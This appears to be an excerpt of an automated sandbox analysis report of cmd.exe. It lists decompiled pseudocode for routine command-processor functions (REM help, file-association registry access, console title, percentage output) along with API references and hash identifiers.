                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 76%
                                    			E011DDE4F(void* __eax, short* __ebx, void* __ecx) {
                                    				void* __edi;
                                    				short _t8;
                                    				short _t9;
                                    				intOrPtr _t18;
                                    				short* _t24;
                                    				long _t29;
                                    				void* _t32;
                                    				void* _t37;
                                    				void* _t41;
                                    				short _t42;
                                    				void* _t46;
                                    				intOrPtr* _t47;
                                    
                                    				_t24 = __ebx;
                                    				_t42 = 0;
                                    				__imp___wcsicmp(L"REM/?", 0x120faa0, _t41, _t46, __ecx);
                                    				_t50 = __eax;
                                    				if(__eax == 0) {
                                    					 *0x120faa6 = 0;
                                    					_t42 = 1;
                                    				}
                                    				_t29 = 0x2d;
                                    				_t47 = E011DE9A0(_t29, _t50);
                                    				if(_t42 != 0) {
                                    					_t8 = 0x2f;
                                    					 *0x120faa0 = _t8;
                                    					_t9 = 0x3f;
                                    					 *0x120faa2 = _t9;
                                    					 *0x120faa4 = 0;
                                    				} else {
                                    					E011DF030(0);
                                    				}
                                    				_t37 = 0x2d;
                                    				if(E011DDCE1(_t24, _t37, _t42) != 0) {
                                    					 *(_t47 + 0x38) =  *(_t47 + 0x38) & 0x00000000;
                                    					 *_t47 = 0x3c;
                                    					goto L8;
                                    				} else {
                                    					E011DF300(_t11, 0, 0, 0);
                                    					if(E011DEEC8() == 0) {
                                    						L8:
                                    						return _t47;
                                    					} else {
                                    						_t32 = 0x20;
                                    						if(E011DF030(_t32) != 0x4000) {
                                    							E011DF300(_t15, 0, 0, 0);
                                    							goto L8;
                                    						} else {
                                    							_t34 =  *0x120fa8c +  *0x120fa8c;
                                    							_t18 = E011E00B0( *0x120fa8c +  *0x120fa8c);
                                    							if(_t18 == 0) {
                                    								E011F9287(_t34);
                                    								__imp__longjmp(0x120b8b8, 1);
                                    								asm("int3");
                                    								__eflags = _t47;
                                    								if(_t47 != 0) {
                                    									 *_t24 = 0;
                                    								}
                                    								return _t24;
                                    							} else {
                                    								 *((intOrPtr*)(_t47 + 0x3c)) = _t18;
                                    								E011E1040(_t18,  *0x120fa8c, 0x120faa0);
                                    								goto L8;
                                    							}
                                    						}
                                    					}
                                    				}
                                    			}
















                                    APIs
                                    • _wcsicmp.MSVCRT ref: 011DDE60
                                      • Part of subcall function 011DF300: _setjmp3.MSVCRT ref: 011DF318
                                      • Part of subcall function 011DF300: iswspace.MSVCRT ref: 011DF35B
                                      • Part of subcall function 011DF300: wcschr.MSVCRT ref: 011DF37D
                                      • Part of subcall function 011DF300: iswdigit.MSVCRT ref: 011DF3DE
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • longjmp.MSVCRT(0120B8B8,00000001,00000000), ref: 011EBCF2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap$AllocProcess_setjmp3_wcsicmpiswdigitiswspacelongjmpwcschr
                                    • String ID: REM/?
                                    • API String ID: 1631155197-4093888634
                                    • Opcode ID: c20010826fabd0c9a5c13c1458c966a1aafad18b07b7e2008b45c3bae48bcc55
                                    • Instruction ID: 3cd621842b3b1623e8b5610aff48c39ddc5880ce92bb9f8b570f225bb38cbc88
                                    • Opcode Fuzzy Hash: c20010826fabd0c9a5c13c1458c966a1aafad18b07b7e2008b45c3bae48bcc55
                                    • Instruction Fuzzy Hash: FF21F5223943129BEB3DAAB6B909B372291DF90655F15442FE602CB1C1EFB088428315
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 78%
                                    			E011F4A29(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                    				intOrPtr* _t24;
                                    				intOrPtr* _t33;
                                    				intOrPtr _t34;
                                    				signed int _t57;
                                    				signed int _t59;
                                    				long _t61;
                                    				void* _t62;
                                    
                                    				_push(0x1c);
                                    				_push(0x11fc120);
                                    				E011E7678(__ebx, __edi, __esi);
                                    				 *((intOrPtr*)(_t62 - 0x2c)) = __ecx;
                                    				_t59 = 0;
                                    				 *((intOrPtr*)(_t62 - 0x24)) = 0;
                                    				_t37 = 0;
                                    				 *((intOrPtr*)(_t62 - 0x28)) = 0;
                                    				_t61 = RegOpenKeyExW(0x80000002, L"Software\\Classes", 0, 0x2000000, _t62 - 0x20);
                                    				 *((intOrPtr*)(_t62 - 0x1c)) = _t61;
                                    				if(_t61 == 0) {
                                    					_t24 = E011DEA40( *((intOrPtr*)( *((intOrPtr*)(_t62 - 0x2c)) + 0x3c)), "=", 3);
                                    					 *((intOrPtr*)(_t62 - 0x2c)) = _t24;
                                    					 *((intOrPtr*)(_t62 - 4)) = 0;
                                    					if( *_t24 != 0) {
                                    						_t59 = E011DDF40(E011E22C0(0, _t24));
                                    						 *((intOrPtr*)(_t62 - 0x24)) = _t59;
                                    						__eflags = _t59;
                                    						if(_t59 != 0) {
                                    							_t46 =  *(E011DD7E6( *((intOrPtr*)(_t62 - 0x2c)))) & 0x0000ffff;
                                    							__eflags = _t46;
                                    							if(_t46 != 0) {
                                    								__eflags = _t46 - 0x3d;
                                    								if(_t46 == 0x3d) {
                                    									 *((intOrPtr*)(_t62 - 0x2c)) = E011DD7E6(_t29);
                                    									_t37 = E011DDF40(E011E22C0(0, _t30));
                                    									 *((intOrPtr*)(_t62 - 0x28)) = _t37;
                                    									__eflags = _t37;
                                    									if(_t37 != 0) {
                                    										_t33 = E011DD7E6( *((intOrPtr*)(_t62 - 0x2c)));
                                    										_t46 = 0;
                                    										__eflags =  *_t33;
                                    										if(__eflags == 0) {
                                    											_t34 = E011F587B(_t37,  *(_t62 - 0x20), _t59, _t59, _t61, __eflags, _t37);
                                    											goto L14;
                                    										} else {
                                    											_push(0);
                                    											goto L9;
                                    										}
                                    									}
                                    								} else {
                                    									_push(0);
                                    									L9:
                                    									_push(0x232a);
                                    									E011DC5A2(_t46);
                                    								}
                                    							} else {
                                    								_t57 = _t59;
                                    								goto L3;
                                    							}
                                    						}
                                    					} else {
                                    						_t57 = 0;
                                    						L3:
                                    						_t34 = E011F4B4E( *(_t62 - 0x20), _t57);
                                    						L14:
                                    						_t61 = _t34;
                                    						 *((intOrPtr*)(_t62 - 0x1c)) = _t61;
                                    					}
                                    					 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                    					E011F4B3F(_t37, _t59);
                                    					RegCloseKey( *(_t62 - 0x20));
                                    					_t22 = _t61;
                                    				}
                                    				return E011E76BD(_t22);
                                    			}











                                    APIs
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,011FC120,0000001C,011F5CB1), ref: 011F4A58
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 011F4B28
                                      • Part of subcall function 011F587B: RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F58AF
                                      • Part of subcall function 011F587B: RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0), ref: 011F58E5
                                      • Part of subcall function 011F587B: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F58F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: wcschr$Close$CreateOpenValueiswspace
                                    • String ID: Software\Classes
                                    • API String ID: 1047774138-1656466771
                                    • Opcode ID: abeff3abc363dee804b817d6d02234e0540efd0bcc4ccd28699ad22e83900b33
                                    • Instruction ID: 16bbcc11c1592b2cd443cb292c473e01d7bef75e1f1bba585d0fb4a715f4daad
                                    • Opcode Fuzzy Hash: abeff3abc363dee804b817d6d02234e0540efd0bcc4ccd28699ad22e83900b33
                                    • Instruction Fuzzy Hash: CF319371F0421ACBDF1CEBF99854AAEB6B1AF98608F10406DD202BB691EB704900CB65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
                                    			E011F51C5(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                    				intOrPtr* _t24;
                                    				intOrPtr* _t32;
                                    				intOrPtr _t33;
                                    				int _t55;
                                    				int _t57;
                                    				long _t59;
                                    				void* _t60;
                                    
                                    				_push(0x1c);
                                    				_push(0x11fc0c0);
                                    				E011E7678(__ebx, __edi, __esi);
                                    				 *((intOrPtr*)(_t60 - 0x2c)) = __ecx;
                                    				_t57 = 0;
                                    				 *((intOrPtr*)(_t60 - 0x24)) = 0;
                                    				_t36 = 0;
                                    				 *((intOrPtr*)(_t60 - 0x28)) = 0;
                                    				_t59 = RegOpenKeyExW(0x80000002, L"Software\\Classes", 0, 0x2000000, _t60 - 0x20);
                                    				 *((intOrPtr*)(_t60 - 0x1c)) = _t59;
                                    				if(_t59 == 0) {
                                    					_t24 = E011DEA40( *((intOrPtr*)( *((intOrPtr*)(_t60 - 0x2c)) + 0x3c)), "=", 3);
                                    					 *((intOrPtr*)(_t60 - 0x2c)) = _t24;
                                    					 *((intOrPtr*)(_t60 - 4)) = 0;
                                    					if( *_t24 != 0) {
                                    						_t57 = E011DDF40(E011E22C0(0, _t24));
                                    						 *((intOrPtr*)(_t60 - 0x24)) = _t57;
                                    						if(_t57 != 0) {
                                    							_t45 =  *(E011DD7E6( *((intOrPtr*)(_t60 - 0x2c)))) & 0x0000ffff;
                                    							if(_t45 != 0) {
                                    								if(_t45 == 0x3d) {
                                    									 *((intOrPtr*)(_t60 - 0x2c)) = E011DD7E6(_t29);
                                    									_t36 = E011DDF40(_t30);
                                    									 *((intOrPtr*)(_t60 - 0x28)) = _t36;
                                    									if(_t36 != 0) {
                                    										_t32 = E011DD7E6( *((intOrPtr*)(_t60 - 0x2c)));
                                    										_t45 = 0;
                                    										if( *_t32 == 0) {
                                    											_t33 = L011F59E6( *(_t60 - 0x20), _t57, _t36);
                                    											goto L14;
                                    										} else {
                                    											_push(0);
                                    											goto L9;
                                    										}
                                    									}
                                    								} else {
                                    									_push(0);
                                    									L9:
                                    									_push(0x232a);
                                    									E011DC5A2(_t45);
                                    								}
                                    							} else {
                                    								_t55 = _t57;
                                    								goto L3;
                                    							}
                                    						}
                                    					} else {
                                    						_t55 = 0;
                                    						L3:
                                    						_t33 = L011F4CF0( *(_t60 - 0x20), _t55);
                                    						L14:
                                    						_t59 = _t33;
                                    						 *((intOrPtr*)(_t60 - 0x1c)) = _t59;
                                    					}
                                    					 *((intOrPtr*)(_t60 - 4)) = 0xfffffffe;
                                    					E011F52D4(_t36, _t57);
                                    					RegCloseKey( *(_t60 - 0x20));
                                    					_t22 = _t59;
                                    				}
                                    				return E011E76BD(_t22);
                                    			}











                                    APIs
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,011FC0C0,0000001C,011F5CE1), ref: 011F51F4
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 011F52BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: wcschr$CloseOpeniswspace
                                    • String ID: Software\Classes
                                    • API String ID: 2439148603-1656466771
                                    • Opcode ID: 4dd9ddeb385e1cd5fbcbc5630ad4a82afa5d8ba7ba8324beceffa71e89ef2d1b
                                    • Instruction ID: 188134ed55947d5e37ba7f7e500ab3202b526c03b3a4153a5a2b73b58eeda4e9
                                    • Opcode Fuzzy Hash: 4dd9ddeb385e1cd5fbcbc5630ad4a82afa5d8ba7ba8324beceffa71e89ef2d1b
                                    • Instruction Fuzzy Hash: 8E21B475E04306CBDF5CEBF9D8546ADB6F2AF98618F11812DE502BB294EB704D01CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E011E100C(long __eax, intOrPtr* __ecx) {
                                    				intOrPtr _v8;
                                    				signed int _v12;
                                    				long _t13;
                                    				intOrPtr _t14;
                                    				signed int _t15;
                                    				short _t21;
                                    				signed int _t24;
                                    				intOrPtr* _t26;
                                    				intOrPtr* _t29;
                                    				WCHAR* _t35;
                                    				long _t40;
                                    				intOrPtr _t43;
                                    				short* _t44;
                                    				WCHAR* _t47;
                                    				void* _t48;
                                    				WCHAR* _t49;
                                    
                                    				_t13 = __eax;
                                    				_t26 = __ecx;
                                    				if(__ecx != 0 &&  *0x1213cc4 == 0 &&  *0x1213ccc == 0) {
                                    					_t13 = E011E00B0(0x20c);
                                    					_t47 = _t13;
                                    					if(_t47 != 0) {
                                    						_t13 = GetConsoleTitleW(_t47, 0x104);
                                    						_t40 = _t13;
                                    						if(_t40 != 0) {
                                    							_v12 = _v12 & 0x00000000;
                                    							_t29 = _t26;
                                    							_t3 = _t29 + 2; // 0x2
                                    							_t48 = _t3;
                                    							do {
                                    								_t14 =  *_t29;
                                    								_t29 = _t29 + 2;
                                    							} while (_t14 != _v12);
                                    							_t15 =  *0x11fd570; // 0x0
                                    							_t17 = _t15 + (_t29 - _t48 >> 1) + _t40 + 0xa;
                                    							_v8 = _t15 + (_t29 - _t48 >> 1) + _t40 + 0xa;
                                    							_t49 = E011E0100(_t47, _t15 + (_t29 - _t48 >> 1) + _t40 + 0xa + _t17);
                                    							if(_t49 == 0) {
                                    								L16:
                                    								return E011E0040(_t47);
                                    							}
                                    							_t47 = _t49;
                                    							_t43 = _v8;
                                    							if( *0x11fd59c == 0) {
                                    								E011E18C0(_t49, _t43, L" - ");
                                    								_t35 = _t49;
                                    								_t10 =  &(_t35[1]); // 0x2
                                    								_t44 = _t10;
                                    								do {
                                    									_t21 =  *_t35;
                                    									_t35 =  &(_t35[1]);
                                    								} while (_t21 != _v12);
                                    								 *0x11fd570 = _t35 - _t44 >> 1;
                                    								E011E18C0(_t49, _v8, _t26);
                                    								 *0x11fd59c = 1;
                                    								L15:
                                    								SetConsoleTitleW(_t49);
                                    								goto L16;
                                    							}
                                    							_t24 =  *0x11fd570; // 0x0
                                    							E011E1040( &(_t49[_t24]), _t43 - _t24, _t26);
                                    							goto L15;
                                    						}
                                    					}
                                    				}
                                    				return _t13;
                                    			}



















                                    APIs
                                    • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104,?,00000000,00000000,?,?,011E0B7F), ref: 011ECDDF
                                    • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000000, - ,?,00000000,00000000,?), ref: 011ECE81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ConsoleTitle
                                    • String ID: -
                                    • API String ID: 3358957663-3695764949
                                    • Opcode ID: 93ba80149b28576f0529ffd912952ffa009b93b1c03078cd9537d4d9349b9673
                                    • Instruction ID: bce5c884affaa0be082da193b3b4460890e0cb0b0d94b9947ffa115a1213973f
                                    • Opcode Fuzzy Hash: 93ba80149b28576f0529ffd912952ffa009b93b1c03078cd9537d4d9349b9673
                                    • Instruction Fuzzy Hash: 3421E47270090167CB2D9BECE85C7BE7EF2AB84714F19412CD91697249EF315946CBC2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 85%
                                    			E011F8430(void* __ecx, void* __edx, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a52) {
                                    				void* _t14;
                                    				void* _t26;
                                    				void* _t31;
                                    
                                    				_t26 = __edx;
                                    				_t25 = __ecx;
                                    				_push(__ecx);
                                    				_push(__ecx);
                                    				if((_a4 | _a8) == 0) {
                                    					_t31 = 0x64;
                                    				} else {
                                    					_t31 = E011E8100(E011E81B0(_a12, _a16, 0x64, 0), _t26, _a4, _a8);
                                    				}
                                    				_t23 = L"%3d";
                                    				E011E274C(0x1213d00, 0x104, L"%3d", _t31);
                                    				E011DC108(_t25, 0x40002722, 1, 0x1213d00);
                                    				if( *0x11fd544 == 0) {
                                    					_t14 = 0;
                                    				} else {
                                    					E011E274C(0x1213d00, 0x104, _t23, _t31);
                                    					E011DC108(_t25, 0x40002722, 1, 0x1213d00);
                                    					printf("\n");
                                    					_t14 = (0 | _a52 != 0x00000000) + 1;
                                    				}
                                    				return _t14;
                                    			}






                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011F8459
                                    • printf.MSVCRT ref: 011F84B4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@printf
                                    • String ID: %3d
                                    • API String ID: 2845598586-2138283368
                                    • Opcode ID: 7f054879c8c387edf171a89102b36f6b4470f0748cc0b2fef102b9542563becc
                                    • Instruction ID: 6f424aa0bbd4063a4a801d53f52ded861282c6af39b1cd7a6efb9a8359747c55
                                    • Opcode Fuzzy Hash: 7f054879c8c387edf171a89102b36f6b4470f0748cc0b2fef102b9542563becc
                                    • Instruction Fuzzy Hash: C3012DB1650105BFFB286BA59C89FEB3EEDDBA5BA4F00401CFB0855080D7B19850C2B1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 63%
                                    			E011E0C70(void* __ecx, int _a4) {
                                    				void* _v0;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				void* _t20;
                                    				void* _t21;
                                    				void* _t23;
                                    				void* _t24;
                                    				int _t34;
                                    				void* _t35;
                                    				void* _t36;
                                    				void* _t37;
                                    
                                    				_t35 = __ecx;
                                    				_t34 = _a4;
                                    				_t39 = _t34 -  *((intOrPtr*)(__ecx + 0x210));
                                    				if(_t34 <=  *((intOrPtr*)(__ecx + 0x210))) {
                                    					L6:
                                    					return 0;
                                    				}
                                    				_push(0x11d262a);
                                    				_t24 = E011E72B5(_t23, _t34, __ecx, _t39,  ~(0 | _t39 > 0x00000000) | _t34 * 0x00000002);
                                    				_t37 = _t36 + 8;
                                    				if(_t24 == 0) {
                                    					E011F292C("onecore\\base\\cmd\\maxpathawarestring.cpp", 0x8007000e);
                                    					return 0x8007000e;
                                    				}
                                    				_t20 =  *(_t35 + 0x208);
                                    				if(_t24 != _t20) {
                                    					__imp__??_V@YAXPAX@Z(_t20);
                                    					_t37 = _t37 + 4;
                                    					 *(_t35 + 0x208) = _t24;
                                    				}
                                    				_t21 =  *(_t35 + 0x208);
                                    				 *(_t35 + 0x210) = _t34;
                                    				if(_t21 == 0) {
                                    					_t21 = _t35;
                                    				}
                                    				memset(_t21, 0, _t34);
                                    				goto L6;
                                    			}
















                                    APIs
                                      • Part of subcall function 011E72B5: __EH_prolog3_catch.LIBCMT ref: 011E7650
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                    • memset.MSVCRT ref: 011E0CDD
                                    Strings
                                    • onecore\base\cmd\maxpathawarestring.cpp, xrefs: 011ECD51
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: H_prolog3_catchmemset
                                    • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                    • API String ID: 620422817-3416068913
                                    • Opcode ID: 13470685c5a9af4dfeb5f5de8d83b0e48ecae77a8ee90b56d2c9fd771910876e
                                    • Instruction ID: e158b470713e9f8187c53dfda88aa9db20da53aef0ddbfa8dd8e52c343665afc
                                    • Opcode Fuzzy Hash: 13470685c5a9af4dfeb5f5de8d83b0e48ecae77a8ee90b56d2c9fd771910876e
                                    • Instruction Fuzzy Hash: 7A01D871300705ABE72C86F99C8DB6BB6D9EB94250F04053DF556D7240DBF6EC51C2A1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E011DDEF9(signed short* __ecx) {
                                    				long _t9;
                                    				signed short* _t11;
                                    
                                    				_t11 = __ecx;
                                    				if(__ecx != 0) {
                                    					while(1) {
                                    						_t9 =  *_t11 & 0x0000ffff;
                                    						if(iswspace(_t9) != 0) {
                                    							goto L6;
                                    						}
                                    						L3:
                                    						if(wcschr(L"=,;", _t9) != 0) {
                                    							if(_t9 == 0) {
                                    								goto L4;
                                    							} else {
                                    								L7:
                                    								_t11 =  &(_t11[1]);
                                    								continue;
                                    							}
                                    							L10:
                                    						}
                                    						L4:
                                    						goto L5;
                                    						L6:
                                    						if(_t9 == 0xa) {
                                    							goto L3;
                                    						} else {
                                    							goto L7;
                                    						}
                                    						goto L5;
                                    					}
                                    				}
                                    				L5:
                                    				return _t11;
                                    				goto L10;
                                    			}





                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: iswspacewcschr
                                    • String ID: =,;
                                    • API String ID: 287713880-1539845467
                                    • Opcode ID: fb635d01fdab01a92e06613db8bd814aba91ffdf2a6cd8081524eadea6ea8e71
                                    • Instruction ID: db932e6896e5513591f390be794c8b091ebc46a050c7d1fd813f3b29e87dfa73
                                    • Opcode Fuzzy Hash: fb635d01fdab01a92e06613db8bd814aba91ffdf2a6cd8081524eadea6ea8e71
                                    • Instruction Fuzzy Hash: D3E04F37608522925F3D0BDEB9599779ED9CAE6A2531B01AFF900D31C0EB6188438293
                                    Uniqueness

                                    Uniqueness Score: -1.00%